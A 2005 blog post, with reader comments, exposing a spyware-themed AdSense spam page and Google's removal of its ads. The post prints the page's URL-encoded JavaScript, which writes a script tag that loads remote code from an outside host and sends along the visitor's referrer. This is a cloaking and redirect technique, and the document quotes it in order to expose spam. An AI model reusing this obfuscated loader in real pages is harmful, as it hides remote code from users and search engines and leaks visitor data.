6 Comments

Google Compliance Slams Low Level Obfuscation

Jul 30, 2005
by

Recently I reported on what I considered a Google Adsense page that was basically “browser spam”- a page constructed to stuff the index with pages in order to redirect traffic through Adsense ads. The problem was the only content on the page was an Adsense ad.


Sorry my friends at Google but you knew it was coming. Here is one reason why merchant’s want granular control over where their CPC ads are placed. Pay attention Microsoft and Yahoo!

Note the use of canonical domain name: spywareremoval

Primary domain name: cnetspyware.com

And the hot button words in the sub directory: windows-xp-spyware

Lastly, and most importantly note the quality content…

It appears the powers that be at Google that read Revenews.com took the snapshot seriously.


If you visit the “content-rich” (cough) http://www.spywareremoval.cnetspyware.com/windows-xp-software you will notice there are no more Google Adsense ads being displayed. The page does sport a nifty obfuscated script which I may get around to de-obfuscating if I get bored. Based on analysis of pages in the MSN index I would hazard a guess the “content” is basically a low-level form of cloaking. To see how I make this logical deduction reference the MSN Index Results as of July 30, 2005:

http://search.msn.com/results.aspx?q=site%3Awww.cnetspyware.com

Note the titles, then hit the page and view source and you’ll be treated to similiar low-level obfuscation.



var asdplf = new String(unescape(‘%3C%73%43%72%69%50%74%20%20%20%20%20%20%54%59%
50%65%3D%27%54%45%58%74%2F%6A%61%76%41%53%43%72%69%50%54%27%3E%
0A%3C%21%2D%2D%0A%64%6F%43%55%6D%65%4E%74%2E%77%72%69%74%45%20
%20%20%20%20%28%22%3C%22%20%20%20%20%20%2B%20%20%20%22%53%43%72%
69%70%74%20%20%20%20%20%74%59%50%65%3D%27%74%65%78%74%2F%4A%41%
56%61%73%63%72%69%70%54%27%20%20%20%53%72%63%3D%27%22%29%3B%0A%
44%4F%63%75%6D%45%6E%74%2E%57%72%49%74%65%20%20%20%20%20%20%20%
20%28%22%48%54%74%70%3A%2F%2F%77%77%77%2E%59%6F%75%72%4E%4F%46%
4F%2E%63%6F%6D%2F%6C%43%61%52%53%2F%74%43%2F%50%61%67%45%2E%50%
68%50%3F%52%45%46%65%72%65%52%3D%22%20%20%20%2B%20%20%65%73%63%
41%50%45%28%44%6F%63%75%6D%65%6E%54%2E%72%65%46%65%72%52%65%72%
29%29%3B%0A%44%6F%63%55%4D%65%6E%74%2E%77%52%69%74%65%20%20%20%
20%20%20%20%28%22%27%3E%3C%22%20%20%20%20%20%2B%20%22%2F%53%63%
52%69%70%74%3E%22%29%3B%0A%2D%2D%3E%0A%3C%2F%53%43%52%69%50%74%
3E%0A’));
document.write(asdplf.toLowerCase());

Thumbs up to Google for a quick response but I would prefer a perfect world where these kinds of pages never make it into the index at all.

Now if Google wants to go the extra mile they might take the second step and simply eject the remaining two pages of this domain out of Google index and it would be just a little less polluted. MSN needs to get a clue.

Have more stellar examples of crummy Adsense spam? Send them direct to this blogger and let’s explore how bad the problem really is or isn’t.

About Wayne Porter

Wayne Porter is one of the original founders of ReveNews.com, and served as the CEO and founder of XBlock Systems a specialized research firm on greynets and malware research before being acquired by unified communications security leader, Factime Security Labs. His work includes serving as a panlist at the Federal Trade Commission to shape legislation on software and the creation of two patent-pending technologies for corporate networks. Wayne is a frequent speaker at e-commerce & business events including CJU, ASW and RSA and frequently cited in the press. He has been designated a Microsoft Security MVP three times and is recognized on Google’s Responsible Security Disclosure page- in addition to receiving the first Summit Legend Award. Wayne currently works as a Security Consultant on Social Media and operates a consultancy on digital worlds. His hobbies include reading science fiction, playing chess, fishing, writing, collecting shiny digital gadgets, playing racquetball and studying memetic engineering. He maintains a personal weblog at WaynePorter.com detailing his explorations in security, web 2.0, and virtual worlds.
You can follow Wayne on Twitter: @wporter.

Filed under: Affiliate Marketing + Search Engine Marketing
  • http://netrn.net/spywareblog/ suzi

    Great work on exposing this practice, Wayne. I've seen quite a few pages like the one you found. I'm with you, those kind of pages should never make it into the index or even be published in the first place.

  • http://blog.360.yahoo.com/blog-NMvZbdw8dLQdukaRO11y4Ez7Eg-- Alex

    Hey Wayne! I just added you to my blogroll on Spyware Informer, mind adding me to yours?

  • http://netrn.net/spywareblog/ suzi

    Great work on exposing this practice, Wayne. I’ve seen quite a few pages like the one you found. I’m with you, those kind of pages should never make it into the index or even be published in the first place.

  • http://www.revenews.com/wayneporter/ Wayne Porter

    Hey Alex- great blog! Consider it done. Please note on your blogroll it is Revenews and not RaveNews…although I do tend to rant and rave. Please drop me a direct line via e-mail when you get the chance. wporter@gmail.com

  • http://blog.360.yahoo.com/blog-NMvZbdw8dLQdukaRO11y4Ez7Eg-- Alex

    LOL, I'm sorry about that! That's rather funny, but I'll change it!

  • http://www.salubritas.com Andy

    There is an easy way to deobfuscate this kind of thing… go to the offending page, enter the following in the address bar and hit enter:

    javascript:void(prompt('',document.body.innerHTML));

    The deobfuscated HTML then pops up in a JavaScript prompt so you can copy and paste into a text editor.

    The script on the page in question writes in an HTML <frame> tag with a source of http://www.yournofo.com/lcars/tc/m/139,257970.htm